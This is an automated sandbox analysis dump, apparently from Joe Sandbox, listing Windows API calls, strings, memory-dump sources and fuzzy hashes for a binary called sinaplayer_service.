                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@StringU?$char_traits@_$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@BasicCountCurrentD@2@@std@@@1@@D@std@@D@std@@@1@@DebugNativeOsfx@?$basic_ostream@OutputPiece@ThreadTickV01@@V?$allocator@V?$allocator@_V?$basic_ostream@V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@W@std@@@std@@Wide@base@@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $0$ApnsHTTP.cpp$catch... m_strStatusText =
                                                                                                                                                                                                    • API String ID: 625621680-236822369
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6C6128C2
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?,?,?), ref: 6C6128D0
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?), ref: 6C6128DC
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C6128E8
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6C612B3B
                                                                                                                                                                                                    • __FCbuild.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C612B56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fdtest$Cbuild_cimagf_crealf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 791420253-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,?,00000180,00000000,6C576E91,00000004,6C576A4C,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?), ref: 6C576D29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6C576D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6C576D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6C576D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6C576D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6C576D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6C576DA3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C5648CA), ref: 6C5A379E
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,6C5648CA), ref: 6C5A37AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2340687224-19120757
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?), ref: 00374B26
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,?), ref: 00374B62
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374B88
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,?,?), ref: 00374BA2
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,?,?), ref: 00374BB7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 00374BD0
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00374BDA
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(?), ref: 00374C02
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?), ref: 00374C20
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C39
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C4E
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?), ref: 00374C66
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00374C84
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C8E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$memset$??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 2184721380-3788999226
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,00000000,?,?,?,?,6C576C6A), ref: 6C576C94
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoInitialize,?,?,?,?,6C576C6A), ref: 6C576CAD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576CB4
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoUninitialize,?,?,?,?,6C576C6A), ref: 6C576CD6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576CDD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6C576C6A), ref: 6C5A387A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6C576C6A), ref: 6C5A3886
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,6C576C6A), ref: 6C5A389C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38AA
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38B0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionLibraryLoadThrow_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: RoInitialize$RoUninitialize$combase.dll$cl
                                                                                                                                                                                                    • API String ID: 885641006-3956676483
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0,8285FFAB,?,00000000,?), ref: 0038FC0A
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0), ref: 0038FC17
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(rpcrt4.dll), ref: 0038FC28
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC3B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,UuidCreate), ref: 0038FC51
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC64
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038FCDD
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD09
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD53
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD64
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CriticalSection$EnterLeave$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: .dmp$UuidCreate$rpcrt4.dll
                                                                                                                                                                                                    • API String ID: 811183846-2929501222
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                    • ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                    • ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3148193194-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                    • ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 00376305
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376327
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00376332
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037635C
                                                                                                                                                                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 0037636D
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376392
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 0037639D
                                                                                                                                                                                                    • ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 003763C9
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3148193194-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000040,00000000), ref: 003918FE
                                                                                                                                                                                                    • wcstol.MSVCR120 ref: 00391917
                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0039195F
                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,?,?), ref: 003919A1
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?), ref: 003919DA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003919E3
                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000,?,?), ref: 00391A11
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00391A2C
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00391A5F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00391A68
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00391EAE), ref: 00391AA9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00391AD9
                                                                                                                                                                                                      • Part of subcall function 003712F0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long), ref: 00371304
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$InternetQuery$AvailableD@std@@@std@@DataU?$char_traits@Unlock@?$basic_streambuf@$FileHttpInfoReadXlength_error@std@@wcstol
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 1847547159-2766056989
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038A9A6
                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 0038A9D4
                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,0039F3DC,crash service,00000000,80000000,80000000,00000000,00000000,00000000,00000000,0038B3C8,00000000), ref: 0038AA01
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 0038AA21
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038AA2E
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,0000007C,000000FF), ref: 0038AA4B
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?,00000000), ref: 0038AA74
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000000), ref: 0038AA8C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message@logging@@Window$??6?$basic_ostream@ClassCreateD@std@@@std@@Helper@logging@@LevelRegisterU?$char_traits@UpdateV01@Vlogmemset
                                                                                                                                                                                                    • String ID: 0$breakpad\tools\crash_service.cc$crash service$window handle is $Vll
                                                                                                                                                                                                    • API String ID: 3772590900-3434040220
                                                                                                                                                                                                    • Opcode ID: 0fd30b87db523852f2b0e8f01ae5b339f6bee1097fc940c4d63e73fd479d84d6
                                                                                                                                                                                                    • Instruction ID: 920799f63a483875dcb90d0a0b4d8b4af1450a2f6b73839858e31a6abc56e4e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fd30b87db523852f2b0e8f01ae5b339f6bee1097fc940c4d63e73fd479d84d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E6B1944208EFDB22DFA8DC86BEEBBBCFB05354F10416AF815E2290D7755904CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,8285FFAB,?,?,00000000,00000000,00000000,0039BCE1,000000FF), ref: 0038E873
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0038E87E
                                                                                                                                                                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 0038E887
                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0038E8A1
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF), ref: 0038E8B1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E8C5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001), ref: 0038E8EF
                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0038E90C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E915
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E922
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0038E925
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E93E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E94F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E987
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E999
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CloseCriticalHandleSection$DeleteDisconnectEnterLeaveMutexNamedPipeReleaseSleepUnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1882864531-0
                                                                                                                                                                                                    • Opcode ID: 51b1fa0c902c3061873927c30c29e8d153efd43d565a5144822ad93060d83c92
                                                                                                                                                                                                    • Instruction ID: a642769c503d3529b349e2d385f951f1694991ae6ec595c3013848534c7163b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b1fa0c902c3061873927c30c29e8d153efd43d565a5144822ad93060d83c92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B841B1B1A00701AFDB12EF25CD85B29B7A8FF05710F0101A9E91997750DB75FC60CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6C5630E8,00000020), ref: 6C562F98
                                                                                                                                                                                                      • Part of subcall function 6C562F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6C562F64
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(?,00000002), ref: 6C562FAD
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,?,?,00000000), ref: 6C562FCA
                                                                                                                                                                                                    • _wsetlocale.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C562FDF
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _getptd.MSVCR120(6C5633E8,00000014,6C562FE4,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C5632D3
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _calloc_crt.MSVCR120(000000B8,00000001), ref: 6C5632F0
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _lock.MSVCR120(0000000C), ref: 6C563306
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: __copytlocinfo_nolock.LIBCMT ref: 6C563317
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: wcscmp.MSVCR120(00000000,6C62F880,00000000,00000000,00000000), ref: 6C563351
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _lock.MSVCR120(0000000C,00000000,00000000,00000000), ref: 6C563368
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C562FE8
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • _getptd.MSVCR120(00000000,00000000,00000000), ref: 6C562FFB
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000000,00000000,?,00000000,?,00000000), ref: 6C563022
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(-00000004,?,?,?,?,?,?,00000000), ref: 6C563039
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000004,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6C563060
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C563075
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5630BA
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6C5B0092
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5B00B1
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5B00FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$_calloc_crt_getptd_mbstowcs_s_wcstombs_s_l$CriticalEnterFreeHeapSection__copytlocinfo_nolock_invoke_watson_malloc_crt_mbstowcs_s_l_wsetlocalemallocwcscmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1259114276-0
                                                                                                                                                                                                    • Opcode ID: 0144612f13c6fecfa0d5ae03084a4d0a683aff6cc7b47b128d140d1b9fd004fc
                                                                                                                                                                                                    • Instruction ID: 1d55873c0953b2be8ee6954e7396beeb88f9cf274d4c315647fbfe977fb9e034
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0144612f13c6fecfa0d5ae03084a4d0a683aff6cc7b47b128d140d1b9fd004fc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E510971D05609DBDB208B66CD44BAF77B8AF85328F50451EE815F7E90DB34D8448BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C574CDD
